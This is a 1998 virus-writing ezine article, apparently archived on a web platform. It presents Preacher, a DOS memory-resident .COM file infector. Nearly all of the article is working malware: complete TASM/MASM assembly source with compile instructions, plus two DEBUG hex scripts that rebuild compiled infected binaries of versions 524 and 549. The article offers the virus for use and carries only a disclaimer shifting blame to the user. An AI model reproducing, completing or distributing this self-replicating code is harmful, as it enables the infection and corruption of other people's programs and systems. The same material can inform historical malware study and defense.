Copy Link
Add to Bookmark
Report

Hexfiles Issue 2 File 002

eZine's profile picture
Published in 
hexfiles
 · 4 months ago

  
HEX-FILES No. 2 File 002
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

Preacher 1.1

by

Mikee



Preacher goes resident as a low memory TSR (one full segment!). It
hooks Int 09. Unlike majority of file infectors, it does not hook
int 21. Infection is carried through int 09 instead. To avoid
crashing the system, Preacher checks InDOS or the DOS busy flag to
check if DOS is processing an Int 21 function.

Preacher only infects COM files through DOS' find file functions. It
is prepended to programs and is 524 bytes long. Contains texts
"PREACHER" (also used to check files for infection) and "Jesus
Reigns!". These are not displayed.

Preacher is still on the development phase. You can expect a better
and expanded version in the future.


ÄÄ PREACHER.ASM STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

;-------------------------------------------------------------------
; HEX-FILES No. 2 March 1998
;-------------------------------------------------------------------
;
; Virus: Preacher 1.1
; Author: Mikee
; Date Written: 24 February 1998
; Origin: Lagro, Novaliches, Quezon City, Philippines
;
;===================================================================
;
; * Dedication *
;
; This virii is dedicated to my loving girlfriend - Tata Nolasco and
; to my one and only Saviour - JESUS CHRIST!
;
; I give thanks to the source of my strength, patience, and wisdom
; who again is the Lord JESUS Christ.
;
;===================================================================
;
; This source code could be compiled in TASM or MASM.
; Compile to COM.
;
;-------------------------------------------------------------------
; Preacher 1.1 is made on a clean thought and on a principle of not
; damaging units it infects. Any damages caused by it due either to
; modifications made by the holder or by bugs within the virii is by
; no means the progammer's responsibility. All responsibility and
; precautions is in the hand of the end user.
;-------------------------------------------------------------------
;
.model small
.code

;-------------------------------------------------- constants
_limit equ 100 ; int 09 counter

org 100h
;-------------------------------------------------- start of preacher virus
start_preacher:

jmp load_preacher

;-------------------------------------------------- virus signature
preacher db "PREACHER"

;-------------------------------------------------- data area
preacher_temp db '\p~~~tmp',0 ; temporary file

maske db '*.com',0 ; target


;-------------------------------------------------- interrupt handler of
;-------------------------------------------------- preacher virus

kernel_preacher proc far
nop ; marker
nop
pushf
call cs:old_int ; call old interrupt

pushf
inc cs:preacher_counter ; increment counter
cmp cs:preacher_counter,_limit ; has it reached limit?
je activate_preacher_kernel ; yes - activate virus
jmp exit_preacher_kernel_2 ; no - exit handler


activate_preacher_kernel:
push ax
push bx
push cx
push dx
push di
push si
push ds
push es

mov cs:preacher_counter,0 ; reset counter
mov bx,cs:busy_off ; get off and seg address
mov es,cs:busy_seg ; of indos
cmp byte ptr es:[bx],0 ; int 21h issued?
je proceed2 ; no - continue
jmp exit_preacher_kernel ; yes - exit handler

proceed2:
sti ; enable interrupts &
mov ah,2fh ; get address of current dta
int 21h ;
mov cs:dta_off,bx ; and save it
mov cs:dta_seg,es
push cs
push cs
pop ds ; now set up segment registers
pop es ; and set up preacher's
mov dx,80h ; own disk transfer area
mov ah,1ah
int 21h

mov ah,4eh ; search for first file to
mov dx,offset maske ; infect
mov cx,0
int 21h
cmp ax,0 ; found?
je check_for_infection ; yes - check if infected
jmp restore_dta ; no - exit handler

search_loop:
mov ah,4fh ; search loop
int 21h
cmp ax,0 ; no more files?
je check_for_infection ; no - check next file for infection
jmp restore_dta ; yes - exit handler

check_for_infection: ; check found file for infection
mov bx,9ch ; is file to big?
cmp word ptr[bx],0 ;
jne search_loop ; yes - search next
mov bx,9ah
cmp word ptr[bx],0ffffh-preacher_len ; is it still big?
ja search_loop ; yes - search next
mov dx,9eh
mov ax,3d00h ; open file for read access
int 21h
jnc _001
jmp restore_dta
_001:
mov bx,ax ; read 11 bytes into inbuf
mov ah,3fh
mov cx,11
mov dx,offset inbuf
int 21h
mov si,offset start_preacher
mov di,offset inbuf
mov cx,11
cld
repe cmpsb ; first 11 bytes the same?
jne next_check ; no - proceed with check
mov ah,3eh ; yes - close file and
int 21h
jmp search_loop ; search next
next_check:
cmp cs:inbuf,'M' ; is file starting with "M" (This is
; used to ensure that the file is a
; true com file and an exe file
; renamed to com)
je search_loop ; yes - search next

infect_file: ; infection routine
mov ah,3eh ; close file previously opened by
int 21h ; search & check
mov dx,9eh
mov ax,4301h ; set attributes to normal
mov cx,0
int 21h
jc restore_dta

mov ax,3d02h ; open for read/write
mov dx,9eh
int 21h
jc restore_dta

mov cx,cs:[9ah] ; get length of file
mov cs:infect_len,cx

mov bx,ax
mov ah,3fh ; read cx bytes to end of virus
mov dx,offset end_preacher
int 21h

mov ax,4200h ; reset r/w pointer to start of file
mov cx,0
mov dx,0
int 21h

mov dx,offset start_preacher ; write preacher's code to start
mov cx,preacher_len ; of host file and append host
add cx,cs:[9ah]
mov ah,40h
int 21h

mov ax,5701h ; restore file date and time
mov cx,cs:[96h]
mov dx,cs:[98h]
int 21h

mov ah,3eh ; close file and
int 21h

mov ax,4301h ; restore attributes
mov dx,9eh
xor ch,ch
mov cl,cs:[95h]
int 21h

;-------------------------------------------------- infection finished
restore_dta:
mov ah,1ah ; restore DTA
mov dx,cs:dta_off
mov ds,cs:dta_seg
int 21h

exit_preacher_kernel:
pop es
pop ds
pop si
pop di
pop dx
pop cx
pop bx
pop ax
exit_preacher_kernel_2:

popf
iret

kernel_preacher endp

;-------------------------------------------------- the process to load virus
;-------------------------------------------------- into memory

load_preacher:
mov bx,4096 ; free some memory space
mov ah,4ah
push cs
pop es
int 21h

preacher_restore: ; restore host file by
mov ah,3ch ; by creating temp file
mov cx,2 ; with hidden attribute
mov dx,offset preacher_temp ; then
int 21h
mov bx,ax
jnc preacher_create_ok
mov al,1
jmp short found_preacher

preacher_create_ok:
mov ah,40h ; rewrite code to file
mov cx,cs:infect_len
mov dx,offset end_preacher
int 21h

mov ah,3eh ; and close temp file
int 21h

mov ax,cs ; set up paramaeter area
mov cs:seg1,ax ; segment addresses for
mov cs:seg2,ax ; program execution
mov cs:seg3,ax

mov ax,4b00h ; load and execute temp file
mov bx,offset pararea
mov dx,offset preacher_temp
int 21h

;---------------------------------------------- return from host execution

mov ah,3ch
mov cx,2
mov dx,offset preacher_temp
int 21h
mov bx,ax
mov ah,3eh
int 21h

mov ax,3509h ; get address of int 9
int 21h
mov cs:word ptr old_int,bx ; and save
mov cs:word ptr old_int+2,es
mov ax,word ptr kernel_preacher ; check if vector already points
cmp es:[bx],ax ; to a loaded preacher
je found_preacher ; if so - do not load preacher

mov ah,34h ; get address of dos busy flag
int 21h
mov cs:busy_seg,es
mov cs:busy_off,bx

mov ax,2509h ; else - set int 9 to kernel
mov dx,offset kernel_preacher
int 21h

mov dx,0ffffh ; allocate 0ffffh space
int 27h ; for resident virus and terminate

found_preacher:

mov ah,4ch ; terminate without staying in
int 21h ; memory

db 'Jesus Reigns!' ; the preachers message

pararea label byte ; parameter area for temp file
dw 0 ; execution
dw 80h
seg1 dw ?
dw 5ch
seg2 dw ?
dw 6ch
seg3 dw ?
infect_len dw _len ; length of infected file stored here

busy_seg dw ? ; InDOS segment
busy_off dw ? ; and offset
old_int dd ? ; old interrupt vector
preacher_counter dw 0 ; counter
dta_off dw ? ; offset of dta saved here
dta_seg dw ? ; segment of dta saved here

end_preacher:

preacher_len equ $-start_preacher ; length of preacher

inbuf db 90h

INT 20H ; this is not part of the actual virus but is included
; as a dummy host to make installation of virus easy

_len equ $-end_preacher ; length of dummy host

end start_preacher

;-----------------------------End of Virus----------------------------

ÄÄ PREACHER.ASM ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



The Preacher.524 virus in this infected file was compiled in TASM 2.01


ÄÄ PREAC524.SCR STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

N PREAC524.COM
E 0100 E9 53 01 50 52 45 41 43 48 45 52 5C 70 7E 7E 7E
E 0110 74 6D 70 00 2A 2E 63 6F 6D 00 90 90 9C 2E FF 1E
E 0120 02 03 9C 2E FF 06 06 03 2E 83 3E 06 03 64 74 03
E 0130 E9 21 01 50 53 51 52 57 56 1E 06 2E C7 06 06 03
E 0140 00 00 2E 8B 1E 00 03 2E 8E 06 FE 02 26 80 3F 00
E 0150 74 03 E9 F7 00 FB B4 2F CD 21 2E 89 1E 08 03 2E
E 0160 8C 06 0A 03 0E 0E 1F 07 BA 80 00 B4 1A CD 21 B4
E 0170 4E BA 14 01 B9 00 00 CD 21 3D 00 00 74 0F E9 BD
E 0180 00 B4 4F CD 21 3D 00 00 74 03 E9 B1 00 BB 9C 00
E 0190 83 3F 00 75 EC BB 9A 00 81 3F F3 FD 77 E3 BA 9E
E 01A0 00 B8 00 3D CD 21 73 03 E9 93 00 8B D8 B4 3F B9
E 01B0 0B 00 BA 0C 03 CD 21 BE 00 01 BF 0C 03 B9 0B 00
E 01C0 FC F3 A6 75 06 B4 3E CD 21 EB B6 2E 80 3E 0C 03
E 01D0 4D 74 AE B4 3E CD 21 BA 9E 00 B8 01 43 B9 00 00
E 01E0 CD 21 72 5A B8 02 3D BA 9E 00 CD 21 72 50 2E 8B
E 01F0 0E 9A 00 2E 89 0E FC 02 8B D8 B4 3F BA 0C 03 CD
E 0200 21 B8 00 42 B9 00 00 BA 00 00 CD 21 BA 00 01 B9
E 0210 0C 02 90 2E 03 0E 9A 00 B4 40 CD 21 B8 01 57 2E
E 0220 8B 0E 96 00 2E 8B 16 98 00 CD 21 B4 3E CD 21 B8
E 0230 01 43 BA 9E 00 32 ED 2E 8A 0E 95 00 CD 21 B4 1A
E 0240 2E 8B 16 08 03 2E 8E 1E 0A 03 CD 21 07 1F 5E 5F
E 0250 5A 59 5B 58 9D CF BB 00 10 B4 4A 0E 07 CD 21 B4
E 0260 3C B9 02 00 BA 0B 01 CD 21 8B D8 73 04 B0 01 EB
E 0270 6C B4 40 2E 8B 0E FC 02 BA 0C 03 CD 21 B4 3E CD
E 0280 21 8C C8 2E A3 F2 02 2E A3 F6 02 2E A3 FA 02 B8
E 0290 00 4B BB EE 02 BA 0B 01 CD 21 B4 3C B9 02 00 BA
E 02A0 0B 01 CD 21 8B D8 B4 3E CD 21 B8 09 35 CD 21 2E
E 02B0 89 1E 02 03 2E 8C 06 04 03 2E A1 1A 01 26 39 07
E 02C0 74 1B B4 34 CD 21 2E 8C 06 FE 02 2E 89 1E 00 03
E 02D0 B8 09 25 BA 1A 01 CD 21 BA FF FF CD 27 B4 4C CD
E 02E0 21 4A 65 73 75 73 20 52 65 69 67 6E 73 21 00 00
E 02F0 80 00 DB 04 5C 00 DB 04 6C 00 DB 04 D0 01 10 01
E 0300 21 03 87 E9 00 F0 0D 00 3E A5 C5 94 E9 C2 01 0D
E 0310 20 20 20 0D 0A 4D 61 62 75 68 61 79 21 0D 0A 0A
E 0320 54 68 69 73 20 69 73 20 50 72 65 61 63 68 65 72
E 0330 2E 35 32 34 20 76 69 72 75 73 20 62 79 20 4D 69
E 0340 6B 65 65 20 63 6F 6D 69 6E 67 20 74 6F 20 79 6F
E 0350 75 20 66 72 6F 6D 20 74 68 65 20 50 68 69 6C 69
E 0360 70 70 69 6E 65 73 2E 0D 0A 42 72 6F 75 67 68 74
E 0370 20 74 6F 20 79 6F 75 20 6C 69 76 65 20 62 79 20
E 0380 48 45 58 2D 46 49 4C 45 53 20 4E 6F 2E 20 32 0D
E 0390 0A 0A 48 45 58 2D 46 49 4C 45 53 2C 20 4D 69 6B
E 03A0 65 65 20 61 6E 64 20 50 75 74 6F 6B 73 61 20 4B
E 03B0 61 77 61 79 61 6E 20 61 72 65 20 6E 6F 74 20 72
E 03C0 65 73 70 6F 6E 73 69 62 6C 65 20 66 6F 72 20 61
E 03D0 63 74 75 61 6C 2C 0D 0A 69 6D 70 6C 69 65 64 20
E 03E0 61 6E 64 2F 6F 72 20 69 6D 61 67 69 6E 61 72 79
E 03F0 20 64 61 6D 61 67 65 20 62 72 6F 75 67 68 74 20
E 0400 61 62 6F 75 74 20 62 79 20 74 68 65 20 75 73 65
E 0410 2C 20 6D 69 73 75 73 65 20 6F 72 20 6E 6F 6E 2D
E 0420 75 73 65 0D 0A 6F 66 20 74 68 69 73 20 76 69 72
E 0430 69 69 2E 20 54 68 65 20 70 65 72 73 6F 6E 20 77
E 0440 68 6F 20 65 78 65 63 75 74 65 73 20 74 68 69 73
E 0450 20 76 69 72 69 69 20 62 65 61 72 73 20 66 75 6C
E 0460 6C 20 72 65 73 70 6F 6E 73 69 62 69 6C 69 74 79
E 0470 0D 0A 66 6F 72 20 68 69 73 2F 68 65 72 20 61 63
E 0480 74 69 6F 6E 73 2E 0D 0A 0A 54 68 69 73 20 76 69
E 0490 72 69 69 20 69 73 20 73 74 72 69 63 74 6C 79 20
E 04A0 66 6F 72 20 65 64 75 63 61 74 69 6F 6E 61 6C 20
E 04B0 6F 72 20 72 65 73 65 61 72 63 68 20 70 75 72 70
E 04C0 6F 73 65 73 20 6F 6E 6C 79 2E 0D 0A 0A 24 08 20
E 04D0 1A BA 07 01 B4 09 CD 21 B4 4C CD 21

RCX
03DC
W
Q

ÄÄ PREAC524.SCR ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ




Preacher 1.2 is a minor update of Preacher 1.1. The only difference is that
it does not infect COMMAND.COM. Otherwise, it is similar to Preacher 1.1.

Preacher.549 was compiled in TASM 2.01


ÄÄ PREAC549.SCR STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

N PREAC549.COM
E 0100 E9 61 01 50 52 45 41 43 48 45 52 5C 70 7E 7E 7E
E 0110 74 6D 70 00 2A 2E 63 6F 6D 00 90 90 9C 2E FF 1E
E 0120 10 03 9C 2E FF 06 14 03 2E 83 3E 14 03 64 74 03
E 0130 E9 2F 01 50 53 51 52 57 56 1E 06 2E C7 06 14 03
E 0140 00 00 2E 8B 1E 0E 03 2E 8E 06 0C 03 26 80 3F 00
E 0150 74 03 E9 05 01 FB B4 2F CD 21 2E 89 1E 16 03 2E
E 0160 8C 06 18 03 0E 0E 1F 07 BA 80 00 B4 1A CD 21 B4
E 0170 4E BA 14 01 B9 00 00 CD 21 3D 00 00 74 0F E9 CB
E 0180 00 B4 4F CD 21 3D 00 00 74 03 E9 BF 00 BE 9E 00
E 0190 BF 1A 03 B9 0B 00 FC F3 A6 74 E6 BB 9C 00 83 3F
E 01A0 00 75 DE BB 9A 00 81 3F DA FD 77 D5 BA 9E 00 B8
E 01B0 00 3D CD 21 73 03 E9 93 00 8B D8 B4 3F B9 0B 00
E 01C0 BA 25 03 CD 21 BE 00 01 BF 25 03 B9 0B 00 FC F3
E 01D0 A6 75 06 B4 3E CD 21 EB A8 2E 80 3E 25 03 4D 74
E 01E0 A0 B4 3E CD 21 BA 9E 00 B8 01 43 B9 00 00 CD 21
E 01F0 72 5A B8 02 3D BA 9E 00 CD 21 72 50 2E 8B 0E 9A
E 0200 00 2E 89 0E 0A 03 8B D8 B4 3F BA 25 03 CD 21 B8
E 0210 00 42 B9 00 00 BA 00 00 CD 21 BA 00 01 B9 25 02
E 0220 90 2E 03 0E 9A 00 B4 40 CD 21 B8 01 57 2E 8B 0E
E 0230 96 00 2E 8B 16 98 00 CD 21 B4 3E CD 21 B8 01 43
E 0240 BA 9E 00 32 ED 2E 8A 0E 95 00 CD 21 B4 1A 2E 8B
E 0250 16 16 03 2E 8E 1E 18 03 CD 21 07 1F 5E 5F 5A 59
E 0260 5B 58 9D CF BB 00 10 B4 4A 0E 07 CD 21 B4 3C B9
E 0270 02 00 BA 0B 01 CD 21 8B D8 73 04 B0 01 EB 6C B4
E 0280 40 2E 8B 0E 0A 03 BA 25 03 CD 21 B4 3E CD 21 8C
E 0290 C8 2E A3 00 03 2E A3 04 03 2E A3 08 03 B8 00 4B
E 02A0 BB FC 02 BA 0B 01 CD 21 B4 3C B9 02 00 BA 0B 01
E 02B0 CD 21 8B D8 B4 3E CD 21 B8 09 35 CD 21 2E 89 1E
E 02C0 10 03 2E 8C 06 12 03 2E A1 1A 01 26 39 07 74 1B
E 02D0 B4 34 CD 21 2E 8C 06 0C 03 2E 89 1E 0E 03 B8 09
E 02E0 25 BA 1A 01 CD 21 BA FF FF CD 27 B4 4C CD 21 4A
E 02F0 65 73 75 73 20 52 65 69 67 6E 73 21 00 00 80 00
E 0300 DA 04 5C 00 DA 04 6C 00 DA 04 C9 01 10 01 21 03
E 0310 87 E9 00 F0 1A 00 9F AD 05 95 43 4F 4D 4D 41 4E
E 0320 44 2E 43 4F 4D E9 B9 01 0D 20 20 20 0D 0A 4D 61
E 0330 62 75 68 61 79 21 0D 0A 0A 54 68 69 73 20 69 73
E 0340 20 50 72 65 61 63 68 65 72 2E 35 34 39 20 76 69
E 0350 72 75 73 20 63 6F 6D 69 6E 67 20 74 6F 20 79 6F
E 0360 75 20 66 72 6F 6D 20 74 68 65 20 50 68 69 6C 69
E 0370 70 70 69 6E 65 73 2E 0D 0A 42 72 6F 75 67 68 74
E 0380 20 74 6F 20 79 6F 75 20 6C 69 76 65 20 62 79 20
E 0390 48 45 58 2D 46 49 4C 45 53 20 4E 6F 2E 20 32 0D
E 03A0 0A 0A 48 45 58 2D 46 49 4C 45 53 2C 20 4D 69 6B
E 03B0 65 65 20 61 6E 64 20 50 75 74 6F 6B 73 61 20 4B
E 03C0 61 77 61 79 61 6E 20 61 72 65 20 6E 6F 74 20 72
E 03D0 65 73 70 6F 6E 73 69 62 6C 65 20 66 6F 72 20 61
E 03E0 63 74 75 61 6C 2C 20 69 6D 70 6C 69 65 64 0D 0A
E 03F0 61 6E 64 2F 6F 72 20 69 6D 61 67 69 6E 61 72 79
E 0400 20 64 61 6D 61 67 65 20 62 72 6F 75 67 68 74 20
E 0410 61 62 6F 75 74 20 62 79 20 74 68 65 20 75 73 65
E 0420 2C 20 6D 69 73 75 73 65 20 6F 72 20 6E 6F 6E 2D
E 0430 75 73 65 20 6F 66 0D 0A 74 68 69 73 20 76 69 72
E 0440 69 69 2E 20 54 68 65 20 70 65 72 73 6F 6E 20 77
E 0450 68 6F 20 65 78 65 63 75 74 65 73 20 74 68 69 73
E 0460 20 76 69 72 69 69 20 62 65 61 72 73 20 66 75 6C
E 0470 6C 20 72 65 73 70 6F 6E 73 69 62 69 6C 69 74 79
E 0480 0D 0A 66 6F 72 20 68 69 73 2F 68 65 72 20 61 63
E 0490 74 69 6F 6E 73 2E 0D 0A 0A 54 68 69 73 20 76 69
E 04A0 72 69 69 20 69 73 20 73 74 72 69 63 74 6C 79 20
E 04B0 66 6F 72 20 65 64 75 63 61 74 69 6F 6E 61 6C 20
E 04C0 6F 72 20 72 65 73 65 61 72 63 68 20 70 75 72 70
E 04D0 6F 73 65 73 20 6F 6E 6C 79 2E 0D 0A 0A 24 08 20
E 04E0 1A 0E 1F BA 07 01 B4 09 CD 21 B4 4C CD 21

RCX
03EE
W
Q

ÄÄ PREAC549.SCR ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

EoF.

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT